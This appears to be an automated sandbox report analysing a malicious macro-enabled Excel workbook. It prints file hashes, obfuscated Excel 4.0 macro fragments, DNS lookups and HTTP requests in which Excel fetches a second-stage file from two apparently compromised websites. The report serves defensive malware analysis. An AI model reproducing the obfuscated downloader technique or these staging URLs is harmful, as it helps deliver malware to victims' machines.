                                                                                                                            File Type:PNG image data, 1714 x 241, 8-bit colormap, non-interlaced
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):14200
                                                                                                                            Entropy (8bit):7.855440184003825
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:384:aeN0UV6iAmjeSvWFL3SdwHEpS4Q24kc49+Tb:jmUxjfC30+kS4Qyob
                                                                                                                            MD5:4FE798EE522800691796BC9446918C90
                                                                                                                            SHA1:1E01CDE49D0B1B5E2F0DFBAD568DC2ECFBEDEAD3
                                                                                                                            SHA-256:EC0BC049D3D30C29567806EB2D555589CD2E1B6B30E9145F77B73A32EC1C1087
                                                                                                                            SHA-512:FF968DA2D921DA198E93E82E2FB15583CFA4696455755A6674BC321CD90AE5502ADDC445A0F8C630D9DC780E77EEC6FFC83F55CD2C16DDE7F465BFD0D89BF1AA
                                                                                                                            Malicious:false
                                                                                                                            Reputation:low
                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\BX1IWYL9.htm
                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                            File Type:HTML document, UTF-8 Unicode text, with very long lines, with CRLF, LF line terminators
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):174739
                                                                                                                            Entropy (8bit):5.2177771329382745
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:3072:Ey/WQHnjZZ++99ffmmWWdmblJwNFmbxikGHSllanRYGUqcVudlxMu:Ey/WQHnjZZ++99ffmmWWdmbldbxs
                                                                                                                            MD5:8390656A9CE7D214386AE81EA0B89D32
                                                                                                                            SHA1:B2B0D4E1F626E16601C3F58EC95109A06312AEF7
                                                                                                                            SHA-256:AC7541E64DD6B4FAF9E12E8DB314AFB68F2E35B8ADBE0EA87C2B5B2D879240A0
                                                                                                                            SHA-512:95FC9DFAE57FD87B252DF9973955BB4DC3EDEB7048BA2B51C12C519F4BB31F223C0A3603F73B0A5558F352817726F89E8CEFC97C49AC1BC8D00A1122A8D00A3B
                                                                                                                            Malicious:false
                                                                                                                            Reputation:low
                                                                                                                            Preview: <!DOCTYPE html>.<html lang="es">.<head>..<meta charset="UTF-8">..<meta name="viewport" content="width=device-width, initial-scale=1.0, viewport-fit=cover" />..<title>Agencia #1 de Marketing Digital en M.xico y La Mejor de LatinoAm.rica | Vendes.Marketing</title>.<meta name="dc.title" content="Agencia #1 de Marketing Digital en M.xico y La Mejor de LatinoAm.rica | Vendes.Marketing" />.<meta name="dc.description" content="La mejor agencia de especialistas en estrategias de marketing digital con enfoque en aumentar tus ventas r.pido. Asesor.a y acompa.amiento de profesionales para conseguir m.s clientes. Obt.n tu revisi.n de marketing digital GRATIS ahora!" />.<meta name="dc.relation" content="https://vendes.marketing/" />.<meta name="dc.source" content="https://vendes.marketing/" />.<meta name="dc.language" content="es_ES" />.<meta name="description" content="La mejor agencia de especialistas en estrategias de marketing digital con enfoque en aumentar tus ventas r.pido. Asesor
                                                                                                                            C:\Users\user\AppData\Local\Temp\~DF6A7C4B1E6825A89E.TMP
                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                            File Type:data
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):512
                                                                                                                            Entropy (8bit):0.0
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:3::
                                                                                                                            MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                                            SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                                            SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                                            SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                                            Malicious:false
                                                                                                                            Reputation:high, very likely benign file
                                                                                                                            C:\Users\user\Desktop\~$CU-6431 report.xlsm
                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                            File Type:data
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):165
                                                                                                                            Entropy (8bit):1.6081032063576088
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:3:RFXI6dtt:RJ1
                                                                                                                            MD5:7AB76C81182111AC93ACF915CA8331D5
                                                                                                                            SHA1:68B94B5D4C83A6FB415C8026AF61F3F8745E2559
                                                                                                                            SHA-256:6A499C020C6F82C54CD991CA52F84558C518CBD310B10623D847D878983A40EF
                                                                                                                            SHA-512:A09AB74DE8A70886C22FB628BDB6A2D773D31402D4E721F9EE2F8CCEE23A569342FEECF1B85C1A25183DD370D1DFFFF75317F628F9B3AA363BBB60694F5362C7
                                                                                                                            Malicious:true
                                                                                                                            Preview: .pratesh ..p.r.a.t.e.s.h.
                                                                                                                            C:\Users\user\besta.ocx
                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                            File Type:HTML document, UTF-8 Unicode text, with very long lines, with CRLF, LF line terminators
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):174739
                                                                                                                            Entropy (8bit):5.2177771329382745
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:3072:Ey/WQHnjZZ++99ffmmWWdmblJwNFmbxikGHSllanRYGUqcVudlxMu:Ey/WQHnjZZ++99ffmmWWdmbldbxs
                                                                                                                            MD5:8390656A9CE7D214386AE81EA0B89D32
                                                                                                                            SHA1:B2B0D4E1F626E16601C3F58EC95109A06312AEF7
                                                                                                                            SHA-256:AC7541E64DD6B4FAF9E12E8DB314AFB68F2E35B8ADBE0EA87C2B5B2D879240A0
                                                                                                                            SHA-512:95FC9DFAE57FD87B252DF9973955BB4DC3EDEB7048BA2B51C12C519F4BB31F223C0A3603F73B0A5558F352817726F89E8CEFC97C49AC1BC8D00A1122A8D00A3B
                                                                                                                            Malicious:false
                                                                                                                            Preview: <!DOCTYPE html>.<html lang="es">.<head>..<meta charset="UTF-8">..<meta name="viewport" content="width=device-width, initial-scale=1.0, viewport-fit=cover" />..<title>Agencia #1 de Marketing Digital en M.xico y La Mejor de LatinoAm.rica | Vendes.Marketing</title>.<meta name="dc.title" content="Agencia #1 de Marketing Digital en M.xico y La Mejor de LatinoAm.rica | Vendes.Marketing" />.<meta name="dc.description" content="La mejor agencia de especialistas en estrategias de marketing digital con enfoque en aumentar tus ventas r.pido. Asesor.a y acompa.amiento de profesionales para conseguir m.s clientes. Obt.n tu revisi.n de marketing digital GRATIS ahora!" />.<meta name="dc.relation" content="https://vendes.marketing/" />.<meta name="dc.source" content="https://vendes.marketing/" />.<meta name="dc.language" content="es_ES" />.<meta name="description" content="La mejor agencia de especialistas en estrategias de marketing digital con enfoque en aumentar tus ventas r.pido. Asesor

                                                                                                                            Static File Info

                                                                                                                            General

                                                                                                                            File type:Microsoft Excel 2007+
                                                                                                                            Entropy (8bit):7.624498524713085
                                                                                                                            TrID:
                                                                                                                            • Excel Microsoft Office Open XML Format document with Macro (51004/1) 51.52%
                                                                                                                            • Excel Microsoft Office Open XML Format document (40004/1) 40.40%
                                                                                                                            • ZIP compressed archive (8000/1) 8.08%
                                                                                                                            File name:CU-6431 report.xlsm
                                                                                                                            File size:38040
                                                                                                                            MD5:0630d6c04e8365531eff7998a7fc40c6
                                                                                                                            SHA1:e4c59420e2024e4f5f5a14e0cd366023d9d0e636
                                                                                                                            SHA256:bd2212ffe0d388a61a3041f146a70b242fa69eace0c7a5f5fe991126a679eec4
                                                                                                                            SHA512:09dec794ce057a4ddddef5a47d4de886949d4e23b447835b843308fc0584ce385f547a2441ddf1ea43e6ae5997d98fbd7657030f7645f2b32e01b8d9ca5f96e7
                                                                                                                            SSDEEP:768:e/I83XfjrjevZCwVItvxmUxjfC30+kS4QyoO0VIqwgb:enrIItvxXYk4pTVIqR
                                                                                                                            File Content Preview:PK..........!.L#li............[Content_Types].xml ...(

                                                                                                                            File Icon

                                                                                                                            Icon Hash:74ecd0e2f696908c

                                                                                                                            Static OLE Info

                                                                                                                            General

                                                                                                                            Document Type:OpenXML
                                                                                                                            Number of OLE Files:1

                                                                                                                            OLE File "CU-6431 report.xlsm"

                                                                                                                            Indicators

                                                                                                                            Has Summary Info:
                                                                                                                            Application Name:
                                                                                                                            Encrypted Document:
                                                                                                                            Contains Word Document Stream:
                                                                                                                            Contains Workbook/Book Stream:
                                                                                                                            Contains PowerPoint Document Stream:
                                                                                                                            Contains Visio Document Stream:
                                                                                                                            Contains ObjectPool Stream:
                                                                                                                            Flash Objects Count:
                                                                                                                            Contains VBA Macros:

                                                                                                                            Macro 4.0 Code

                                                                                                                            4,7,=CHAR('Ss1'!E45)
                                                                                                                            11,1,o
                                                                                                                            
                                                                                                                            1,5,L
                                                                                                                            11,1,=CHAR('Ss1'!N43)
                                                                                                                            
                                                                                                                            2,0,r
                                                                                                                            10,4,=CHAR('Ss1'!D39)
                                                                                                                            
                                                                                                                            1,8,C
                                                                                                                            12,3,=CHAR('Ss1'!S46)
                                                                                                                            
                                                                                                                            1,3,=FORMULA()=FORMULA()=FORMULA('Buk1'!E11,'Buk2'!B12)=FORMULA('Buk2'!H5,'Buk3'!H3)=FORMULA('Buk3'!C9,'Buk4'!C2)=FORMULA('Buk4'!I8,'Buk5'!F2)=FORMULA('Buk5'!B12,'Buk6'!B10)=FORMULA('Buk6'!G3,'Buk7'!I2)=FORMULA('Buk7'!D13,'Buk1'!A3)=FORMULA('Buk3'!H3&'Ss1'!O6&'Ss1'!D16&'Ss1'!K13&'Ss1'!R12&'Ss1'!R14,D3)=FORMULA('Buk3'!H3&'Buk7'!I2&'Buk4'!C2&'Buk5'!F2&'Buk5'!F2&Ss1br2!B3&'Buk1'!A3&Ss1br2!D5&'Buk6'!B10&Ss1br2!G3&'Buk7'!I2&'Buk7'!I2&Ss1br2!B9,D17)=FORMULA('Buk3'!H3&'Ss1'!H21&'Ss1'!G23&'Ss1'!R12&"SASA"&'Ss1'!R9&'Ss1'!I8&'Ss1'!R7&'Ss1'!R11&'Buk7'!I2&'Buk4'!C2&'Buk5'!F2&'Buk5'!F2&Ss1br2!B3&'Buk1'!A3&Ss1br2!D5&'Buk6'!B10&Ss1br2!G3&'Buk7'!I2&'Buk7'!I2&Ss1br2!L5&'Ss1'!R14,D19)=FORMULA('Buk3'!H3&'Ss1'!H21&'Ss1'!G23&'Ss1'!R12&"SASA1"&'Ss1'!R9&'Ss1'!I8&'Ss1'!R7&'Ss1'!R11&'Buk7'!I2&'Buk4'!C2&'Buk5'!F2&'Buk5'!F2&Ss1br2!B3&'Buk1'!A3&Ss1br2!D5&'Buk6'!B10&Ss1br2!G3&'Buk7'!I2&'Buk7'!I2&Ss1br2!O9&'Ss1'!R14,D21)=FORMULA('Buk3'!H3&'Ss1'!H21&'Ss1'!G23&'Ss1'!R12&"SASA2"&'Ss1'!R9&'Ss1'!I8&'Ss1'!R7&'Ss1'!M20&'Ss1'!K23&'Ss1'!N24&'Ss1'!P18&'Ss1'!K18&'Ss1'!R12&'Ss1'!I8&'Ss1'!R14&'Ss1'!R7&'Ss1'!R14,D23)=FORMULA('Buk3'!H3&'Ss1'!J7&'Ss1'!N15&'Ss1'!J7&'Ss1'!M20&'Ss1'!R12&'Ss1'!R16&Ss1br2!Q3&Ss1br2!K10&Ss1br2!I1&'Ss1'!R11&'Ss1'!R5&'Ss1'!R5&'Ss1'!R3&'Ss1'!P2&'Ss1'!O1&'Ss1'!O9&'Ss1'!N5&'Ss1'!F3&'Ss1'!R5&'Ss1'!B9&'Ss1'!I12&'Ss1'!K8&'Ss1'!R7&'Ss1'!R16&'Ss1'!R18&"LKLW"&'Ss1'!R14,D25)=FORMULA('Buk3'!H3&'Ss1'!K54&'Ss1'!K56&'Ss1'!J58&'Ss1'!M52&'Ss1'!K54&'Ss1'!M61&'Ss1'!R12&'Ss1'!R14,D32)
                                                                                                                            
                                                                                                                            2,7,=
                                                                                                                            8,2,=CHAR('Ss1'!G40)
                                                                                                                            
                                                                                                                            1,2,A
                                                                                                                            7,8,=CHAR('Ss1'!J39)
                                                                                                                            
                                                                                                                            2,6,=CHAR('Ss1'!R41)
                                                                                                                            9,1,e
                                                                                                                            

                                                                                                                            Network Behavior

                                                                                                                            Network Port Distribution

                                                                                                                            TCP Packets

                                                                                                                            Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                                                            Dec 2, 2021 11:35:25.190850019 CET49747443192.168.2.3107.180.46.229
                                                                                                                            Dec 2, 2021 11:35:25.191468000 CET49747443192.168.2.3107.180.46.229
                                                                                                                            Dec 2, 2021 11:35:25.191490889 CET44349747107.180.46.229192.168.2.3
                                                                                                                            Dec 2, 2021 11:35:25.546701908 CET44349747107.180.46.229192.168.2.3
                                                                                                                            Dec 2, 2021 11:35:25.547060966 CET49747443192.168.2.3107.180.46.229
                                                                                                                            Dec 2, 2021 11:35:25.559616089 CET49747443192.168.2.3107.180.46.229
                                                                                                                            Dec 2, 2021 11:35:25.559654951 CET44349747107.180.46.229192.168.2.3
                                                                                                                            Dec 2, 2021 11:35:25.559947968 CET44349747107.180.46.229192.168.2.3
                                                                                                                            Dec 2, 2021 11:35:25.560098886 CET49747443192.168.2.3107.180.46.229
                                                                                                                            Dec 2, 2021 11:35:25.561243057 CET49747443192.168.2.3107.180.46.229
                                                                                                                            Dec 2, 2021 11:35:25.604865074 CET44349747107.180.46.229192.168.2.3
                                                                                                                            Dec 2, 2021 11:35:26.803525925 CET44349747107.180.46.229192.168.2.3
                                                                                                                            Dec 2, 2021 11:35:26.803574085 CET44349747107.180.46.229192.168.2.3
                                                                                                                            Dec 2, 2021 11:35:26.803781033 CET49747443192.168.2.3107.180.46.229
                                                                                                                            Dec 2, 2021 11:35:26.803817034 CET44349747107.180.46.229192.168.2.3
                                                                                                                            Dec 2, 2021 11:35:26.803941011 CET49747443192.168.2.3107.180.46.229
                                                                                                                            Dec 2, 2021 11:35:26.803956032 CET49747443192.168.2.3107.180.46.229
                                                                                                                            Dec 2, 2021 11:35:26.804691076 CET44349747107.180.46.229192.168.2.3
                                                                                                                            Dec 2, 2021 11:35:26.804857969 CET49747443192.168.2.3107.180.46.229
                                                                                                                            Dec 2, 2021 11:35:26.804884911 CET44349747107.180.46.229192.168.2.3
                                                                                                                            Dec 2, 2021 11:35:26.804956913 CET49747443192.168.2.3107.180.46.229
                                                                                                                            Dec 2, 2021 11:35:26.913943052 CET44349747107.180.46.229192.168.2.3
                                                                                                                            Dec 2, 2021 11:35:26.914113998 CET49747443192.168.2.3107.180.46.229
                                                                                                                            Dec 2, 2021 11:35:26.914153099 CET44349747107.180.46.229192.168.2.3
                                                                                                                            Dec 2, 2021 11:35:26.914221048 CET49747443192.168.2.3107.180.46.229
                                                                                                                            Dec 2, 2021 11:35:26.914786100 CET44349747107.180.46.229192.168.2.3
                                                                                                                            Dec 2, 2021 11:35:26.914891958 CET49747443192.168.2.3107.180.46.229
                                                                                                                            Dec 2, 2021 11:35:26.914906025 CET44349747107.180.46.229192.168.2.3
                                                                                                                            Dec 2, 2021 11:35:26.914966106 CET49747443192.168.2.3107.180.46.229
                                                                                                                            Dec 2, 2021 11:35:27.024574041 CET44349747107.180.46.229192.168.2.3
                                                                                                                            Dec 2, 2021 11:35:27.024923086 CET44349747107.180.46.229192.168.2.3
                                                                                                                            Dec 2, 2021 11:35:27.025016069 CET49747443192.168.2.3107.180.46.229
                                                                                                                            Dec 2, 2021 11:35:27.025038004 CET44349747107.180.46.229192.168.2.3
                                                                                                                            Dec 2, 2021 11:35:27.025146008 CET49747443192.168.2.3107.180.46.229
                                                                                                                            Dec 2, 2021 11:35:27.025152922 CET44349747107.180.46.229192.168.2.3
                                                                                                                            Dec 2, 2021 11:35:27.025384903 CET49747443192.168.2.3107.180.46.229
                                                                                                                            Dec 2, 2021 11:35:27.163017035 CET44349747107.180.46.229192.168.2.3
                                                                                                                            Dec 2, 2021 11:35:27.163151026 CET44349747107.180.46.229192.168.2.3
                                                                                                                            Dec 2, 2021 11:35:27.163369894 CET49747443192.168.2.3107.180.46.229
                                                                                                                            Dec 2, 2021 11:35:27.163405895 CET44349747107.180.46.229192.168.2.3
                                                                                                                            Dec 2, 2021 11:35:27.163427114 CET49747443192.168.2.3107.180.46.229
                                                                                                                            Dec 2, 2021 11:35:27.163439989 CET44349747107.180.46.229192.168.2.3
                                                                                                                            Dec 2, 2021 11:35:27.163563967 CET49747443192.168.2.3107.180.46.229
                                                                                                                            Dec 2, 2021 11:35:27.163582087 CET44349747107.180.46.229192.168.2.3
                                                                                                                            Dec 2, 2021 11:35:27.163603067 CET44349747107.180.46.229192.168.2.3
                                                                                                                            Dec 2, 2021 11:35:27.163682938 CET49747443192.168.2.3107.180.46.229
                                                                                                                            Dec 2, 2021 11:35:27.163702011 CET44349747107.180.46.229192.168.2.3
                                                                                                                            Dec 2, 2021 11:35:27.163831949 CET49747443192.168.2.3107.180.46.229
                                                                                                                            Dec 2, 2021 11:35:27.165640116 CET44349747107.180.46.229192.168.2.3
                                                                                                                            Dec 2, 2021 11:35:27.165787935 CET49747443192.168.2.3107.180.46.229
                                                                                                                            Dec 2, 2021 11:35:27.165802956 CET44349747107.180.46.229192.168.2.3
                                                                                                                            Dec 2, 2021 11:35:27.165937901 CET49747443192.168.2.3107.180.46.229
                                                                                                                            Dec 2, 2021 11:35:27.264194965 CET8049744162.240.9.126192.168.2.3
                                                                                                                            Dec 2, 2021 11:35:27.264498949 CET4974480192.168.2.3162.240.9.126
                                                                                                                            Dec 2, 2021 11:35:27.273766994 CET44349747107.180.46.229192.168.2.3
                                                                                                                            Dec 2, 2021 11:35:27.273947001 CET44349747107.180.46.229192.168.2.3
                                                                                                                            Dec 2, 2021 11:35:27.274218082 CET49747443192.168.2.3107.180.46.229
                                                                                                                            Dec 2, 2021 11:35:27.274256945 CET44349747107.180.46.229192.168.2.3
                                                                                                                            Dec 2, 2021 11:35:27.274282932 CET49747443192.168.2.3107.180.46.229
                                                                                                                            Dec 2, 2021 11:35:27.274570942 CET49747443192.168.2.3107.180.46.229
                                                                                                                            Dec 2, 2021 11:35:27.274590969 CET44349747107.180.46.229192.168.2.3
                                                                                                                            Dec 2, 2021 11:35:27.274714947 CET49747443192.168.2.3107.180.46.229
                                                                                                                            Dec 2, 2021 11:35:27.478631020 CET44349747107.180.46.229192.168.2.3
                                                                                                                            Dec 2, 2021 11:35:27.478745937 CET44349747107.180.46.229192.168.2.3
                                                                                                                            Dec 2, 2021 11:35:27.478756905 CET49747443192.168.2.3107.180.46.229
                                                                                                                            Dec 2, 2021 11:35:27.478777885 CET44349747107.180.46.229192.168.2.3
                                                                                                                            Dec 2, 2021 11:35:27.478816032 CET49747443192.168.2.3107.180.46.229
                                                                                                                            Dec 2, 2021 11:35:27.478841066 CET49747443192.168.2.3107.180.46.229
                                                                                                                            Dec 2, 2021 11:35:27.478847980 CET44349747107.180.46.229192.168.2.3
                                                                                                                            Dec 2, 2021 11:35:27.478869915 CET44349747107.180.46.229192.168.2.3
                                                                                                                            Dec 2, 2021 11:35:27.478899002 CET49747443192.168.2.3107.180.46.229
                                                                                                                            Dec 2, 2021 11:35:27.478905916 CET44349747107.180.46.229192.168.2.3
                                                                                                                            Dec 2, 2021 11:35:27.478915930 CET49747443192.168.2.3107.180.46.229
                                                                                                                            Dec 2, 2021 11:35:27.478964090 CET49747443192.168.2.3107.180.46.229
                                                                                                                            Dec 2, 2021 11:35:27.479135036 CET44349747107.180.46.229192.168.2.3
                                                                                                                            Dec 2, 2021 11:35:27.479218960 CET49747443192.168.2.3107.180.46.229
                                                                                                                            Dec 2, 2021 11:35:27.479231119 CET44349747107.180.46.229192.168.2.3
                                                                                                                            Dec 2, 2021 11:35:27.479286909 CET49747443192.168.2.3107.180.46.229
                                                                                                                            Dec 2, 2021 11:35:27.479300976 CET44349747107.180.46.229192.168.2.3
                                                                                                                            Dec 2, 2021 11:35:27.479326010 CET44349747107.180.46.229192.168.2.3
                                                                                                                            Dec 2, 2021 11:35:27.479373932 CET49747443192.168.2.3107.180.46.229
                                                                                                                            Dec 2, 2021 11:35:27.479403973 CET49747443192.168.2.3107.180.46.229
                                                                                                                            Dec 2, 2021 11:35:27.479408979 CET44349747107.180.46.229192.168.2.3
                                                                                                                            Dec 2, 2021 11:35:27.479576111 CET49747443192.168.2.3107.180.46.229
                                                                                                                            Dec 2, 2021 11:35:27.479612112 CET44349747107.180.46.229192.168.2.3
                                                                                                                            Dec 2, 2021 11:35:27.479703903 CET49747443192.168.2.3107.180.46.229
                                                                                                                            Dec 2, 2021 11:35:27.479713917 CET44349747107.180.46.229192.168.2.3
                                                                                                                            Dec 2, 2021 11:35:27.479768038 CET49747443192.168.2.3107.180.46.229
                                                                                                                            Dec 2, 2021 11:35:27.479825020 CET44349747107.180.46.229192.168.2.3
                                                                                                                            Dec 2, 2021 11:35:27.479895115 CET49747443192.168.2.3107.180.46.229
                                                                                                                            Dec 2, 2021 11:35:27.479907036 CET44349747107.180.46.229192.168.2.3
                                                                                                                            Dec 2, 2021 11:35:27.479926109 CET44349747107.180.46.229192.168.2.3
                                                                                                                            Dec 2, 2021 11:35:27.479954958 CET49747443192.168.2.3107.180.46.229
                                                                                                                            Dec 2, 2021 11:35:27.480010033 CET49747443192.168.2.3107.180.46.229
                                                                                                                            Dec 2, 2021 11:35:27.480016947 CET44349747107.180.46.229192.168.2.3
                                                                                                                            Dec 2, 2021 11:35:27.480071068 CET49747443192.168.2.3107.180.46.229
                                                                                                                            Dec 2, 2021 11:35:27.589056969 CET44349747107.180.46.229192.168.2.3
                                                                                                                            Dec 2, 2021 11:35:27.589200020 CET44349747107.180.46.229192.168.2.3
                                                                                                                            Dec 2, 2021 11:35:27.589258909 CET49747443192.168.2.3107.180.46.229
                                                                                                                            Dec 2, 2021 11:35:27.589294910 CET49747443192.168.2.3107.180.46.229
                                                                                                                            Dec 2, 2021 11:35:27.597692966 CET49747443192.168.2.3107.180.46.229
                                                                                                                            Dec 2, 2021 11:35:27.597739935 CET44349747107.180.46.229192.168.2.3
                                                                                                                            Dec 2, 2021 11:35:27.597757101 CET49747443192.168.2.3107.180.46.229
                                                                                                                            Dec 2, 2021 11:35:27.597824097 CET49747443192.168.2.3107.180.46.229
                                                                                                                            Dec 2, 2021 11:35:30.176702023 CET8049746107.180.46.229192.168.2.3
                                                                                                                            Dec 2, 2021 11:35:30.176899910 CET4974680192.168.2.3107.180.46.229
                                                                                                                            Dec 2, 2021 11:37:07.268068075 CET4974680192.168.2.3107.180.46.229
                                                                                                                            Dec 2, 2021 11:37:07.268605947 CET4974480192.168.2.3162.240.9.126
                                                                                                                            Dec 2, 2021 11:37:07.610133886 CET4974680192.168.2.3107.180.46.229
                                                                                                                            Dec 2, 2021 11:37:07.719472885 CET4974480192.168.2.3162.240.9.126
                                                                                                                            Dec 2, 2021 11:37:08.219482899 CET4974680192.168.2.3107.180.46.229
                                                                                                                            Dec 2, 2021 11:37:08.532373905 CET4974480192.168.2.3162.240.9.126
                                                                                                                            Dec 2, 2021 11:37:09.422728062 CET4974680192.168.2.3107.180.46.229
                                                                                                                            Dec 2, 2021 11:37:10.141457081 CET4974480192.168.2.3162.240.9.126
                                                                                                                            Dec 2, 2021 11:37:11.829154968 CET4974680192.168.2.3107.180.46.229
                                                                                                                            Dec 2, 2021 11:37:13.360491037 CET4974480192.168.2.3162.240.9.126
                                                                                                                            Dec 2, 2021 11:37:16.630887985 CET4974680192.168.2.3107.180.46.229
                                                                                                                            Dec 2, 2021 11:37:19.798527002 CET4974480192.168.2.3162.240.9.126
                                                                                                                            Dec 2, 2021 11:37:26.236566067 CET4974680192.168.2.3107.180.46.229
                                                                                                                            Dec 2, 2021 11:37:32.683427095 CET4974480192.168.2.3162.240.9.126

                                                                                                                            UDP Packets

| Timestamp | Source Port | Dest Port | Source IP | Dest IP |
| --- | --- | --- | --- | --- |
| Dec 2, 2021 11:35:21.113451004 CET | 54154 | 53 | 192.168.2.3 | 8.8.8.8 |
| Dec 2, 2021 11:35:21.131402969 CET | 53 | 54154 | 8.8.8.8 | 192.168.2.3 |
| Dec 2, 2021 11:35:24.094537020 CET | 52806 | 53 | 192.168.2.3 | 8.8.8.8 |
| Dec 2, 2021 11:35:24.114315033 CET | 53 | 52806 | 8.8.8.8 | 192.168.2.3 |

                                                                                                                            DNS Queries

| Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class |
| --- | --- | --- | --- | --- | --- | --- | --- |
| Dec 2, 2021 11:35:21.113451004 CET | 192.168.2.3 | 8.8.8.8 | 0xfda6 | Standard query (0) | standoutglobal.com | A (IP address) | IN (0x0001) |
| Dec 2, 2021 11:35:24.094537020 CET | 192.168.2.3 | 8.8.8.8 | 0x40fa | Standard query (0) | vendes.marketing | A (IP address) | IN (0x0001) |

                                                                                                                            DNS Answers

| Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class |
| --- | --- | --- | --- | --- | --- | --- | --- | --- | --- |
| Dec 2, 2021 11:35:21.131402969 CET | 8.8.8.8 | 192.168.2.3 | 0xfda6 | No error (0) | standoutglobal.com | | 162.240.9.126 | A (IP address) | IN (0x0001) |
| Dec 2, 2021 11:35:24.114315033 CET | 8.8.8.8 | 192.168.2.3 | 0x40fa | No error (0) | vendes.marketing | | 107.180.46.229 | A (IP address) | IN (0x0001) |

                                                                                                                            HTTP Request Dependency Graph

                                                                                                                            • standoutglobal.com
                                                                                                                            • vendes.marketing

                                                                                                                            HTTP Packets

| Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
| --- | --- | --- | --- | --- | --- |
| 0 | 192.168.2.3 | 49745 | 162.240.9.126 | 443 | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |

Timestamp | kBytes transferred | Direction | Data


| Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
| --- | --- | --- | --- | --- | --- |
| 1 | 192.168.2.3 | 49747 | 107.180.46.229 | 443 | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |

Timestamp | kBytes transferred | Direction | Data


| Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
| --- | --- | --- | --- | --- | --- |
| 2 | 192.168.2.3 | 49744 | 162.240.9.126 | 80 | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |

Timestamp | kBytes transferred | Direction | Data
Dec 2, 2021 11:35:21.295418024 CET | 1236 | OUT | GET /2/MWpqeVgZ/ HTTP/1.1
                                                                                                                            Accept: */*
                                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                            Host: standoutglobal.com
                                                                                                                            Connection: Keep-Alive
Dec 2, 2021 11:35:22.259110928 CET | 1236 | IN | HTTP/1.1 301 Moved Permanently
                                                                                                                            Date: Thu, 02 Dec 2021 10:35:20 GMT
                                                                                                                            Server: Apache
                                                                                                                            Vary: Accept-Encoding,Cookie
                                                                                                                            Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                            Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                                            X-Redirect-By: WordPress
                                                                                                                            Upgrade: h2,h2c
                                                                                                                            Connection: Upgrade, Keep-Alive
                                                                                                                            Location: https://standoutglobal.com/2/MWpqeVgZ/
                                                                                                                            Content-Length: 0
                                                                                                                            Keep-Alive: timeout=5, max=100
                                                                                                                            Content-Type: text/html; charset=UTF-8


                                                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                                                            3 | 192.168.2.3 | 49746 | 107.180.46.229 | 80 | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                            Timestamp | kBytes transferred | Direction | Data
                                                                                                                            Dec 2, 2021 11:35:24.230601072 CET | 1251 | OUT | GET /transmigrant/Wplzr/ HTTP/1.1
                                                                                                                            Accept: */*
                                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                            Host: vendes.marketing
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Dec 2, 2021 11:35:25.175854921 CET | 1252 | IN | HTTP/1.1 301 Moved Permanently
                                                                                                                            Date: Thu, 02 Dec 2021 10:35:24 GMT
                                                                                                                            Server: Apache
                                                                                                                            X-Powered-By: PHP/7.3.30
                                                                                                                            Link: <https://vendes.marketing/wp-json/>; rel="https://api.w.org/"
                                                                                                                            Expires: Thu, 02 Dec 2021 11:35:25 GMT
                                                                                                                            Cache-Control: max-age=3600
                                                                                                                            X-Redirect-By: WordPress
                                                                                                                            Upgrade: h2,h2c
                                                                                                                            Connection: Upgrade, Keep-Alive
                                                                                                                            Location: https://vendes.marketing
                                                                                                                            Content-Length: 0
                                                                                                                            Keep-Alive: timeout=5
                                                                                                                            Content-Type: text/html; charset=UTF-8


                                                                                                                            HTTPS Proxied Packets

                                                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                                                            0 | 192.168.2.3 | 49745 | 162.240.9.126 | 443 | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                            Timestamp | kBytes transferred | Direction | Data
